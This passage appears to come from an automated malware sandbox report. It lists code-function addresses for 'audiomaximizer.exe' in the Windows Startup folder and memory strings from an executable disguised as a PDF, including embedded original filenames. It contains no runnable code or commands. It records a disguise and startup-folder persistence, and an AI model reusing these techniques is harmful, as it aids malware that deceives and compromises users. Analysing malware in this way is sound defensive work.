            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_016853708_2_01685370
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168D2788_2_0168D278
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168C4688_2_0168C468
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168C7388_2_0168C738
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_016869A08_2_016869A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168E9888_2_0168E988
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168CA088_2_0168CA08
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168CCD88_2_0168CCD8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_01686FC88_2_01686FC8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168CFA98_2_0168CFA9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_01683E098_2_01683E09
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168F9608_2_0168F960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168E97A8_2_0168E97A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_01683AB18_2_01683AB1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0A4688_2_05D0A468
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0AB508_2_05D0AB50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D09D108_2_05D09D10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0E5D08_2_05D0E5D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0E5C08_2_05D0E5C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0A4628_2_05D0A462
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0E1788_2_05D0E178
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0E1698_2_05D0E169
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D000408_2_05D00040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D000078_2_05D00007
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D082588_2_05D08258
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D082688_2_05D08268
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0EFB88_2_05D0EFB8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0EB508_2_05D0EB50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0EB608_2_05D0EB60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D00B308_2_05D00B30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D00B218_2_05D00B21
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0D4708_2_05D0D470
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0F4108_2_05D0F410
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0DD198_2_05D0DD19
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D09D008_2_05D09D00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0DD208_2_05D0DD20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0D8C88_2_05D0D8C8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_05D0F8688_2_05D0F868
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED9E088_2_06ED9E08
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED26808_2_06ED2680
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED0E988_2_06ED0E98
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED0E978_2_06ED0E97
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED3E688_2_06ED3E68
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED267B8_2_06ED267B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED56478_2_06ED5647
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED3E578_2_06ED3E57
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED56508_2_06ED5650
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED6E298_2_06ED6E29
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED86208_2_06ED8620
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED6E388_2_06ED6E38
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED86118_2_06ED8611
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED5FE08_2_06ED5FE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED47F88_2_06ED47F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED47F78_2_06ED47F7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED77C88_2_06ED77C8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED5FDB8_2_06ED5FDB
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED8FA18_2_06ED8FA1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED77B88_2_06ED77B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED8FB08_2_06ED8FB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06EDB7008_2_06EDB700
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED1CE98_2_06ED1CE9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED04F78_2_06ED04F7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED1CF08_2_06ED1CF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED4CC08_2_06ED4CC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED34D88_2_06ED34D8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED34D78_2_06ED34D7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED64A88_2_06ED64A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED64A78_2_06ED64A7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED4CBF8_2_06ED4CBF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED7C908_2_06ED7C90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED94678_2_06ED9467
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED7C7F8_2_06ED7C7F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED94788_2_06ED9478
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED9DF78_2_06ED9DF7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED05088_2_06ED0508
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED72EF8_2_06ED72EF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED8AE88_2_06ED8AE8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED8AD98_2_06ED8AD9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED13608_2_06ED1360
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED2B488_2_06ED2B48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED2B478_2_06ED2B47
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED13578_2_06ED1357
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED432B8_2_06ED432B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED43308_2_06ED4330
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED73008_2_06ED7300
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED5B188_2_06ED5B18
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED5B178_2_06ED5B17
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED00408_2_06ED0040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED18288_2_06ED1828
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED18278_2_06ED1827
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED300B8_2_06ED300B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED00068_2_06ED0006
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED30108_2_06ED3010
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED09C78_2_06ED09C7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED09D08_2_06ED09D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED39A08_2_06ED39A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED21B88_2_06ED21B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED21B78_2_06ED21B7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED51888_2_06ED5188
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED51878_2_06ED5187
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED39978_2_06ED3997
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED696B8_2_06ED696B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED69708_2_06ED6970
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED81488_2_06ED8148
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED99408_2_06ED9940
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED81588_2_06ED8158
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_06ED99308_2_06ED9930
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073FD1288_2_073FD128
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073F31988_2_073F3198
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073FD1008_2_073FD100
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073FA0F88_2_073FA0F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073FA0E88_2_073FA0E8
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000000.1680054852.0000000000553000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFisa.exe* vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4126959948.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename0 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
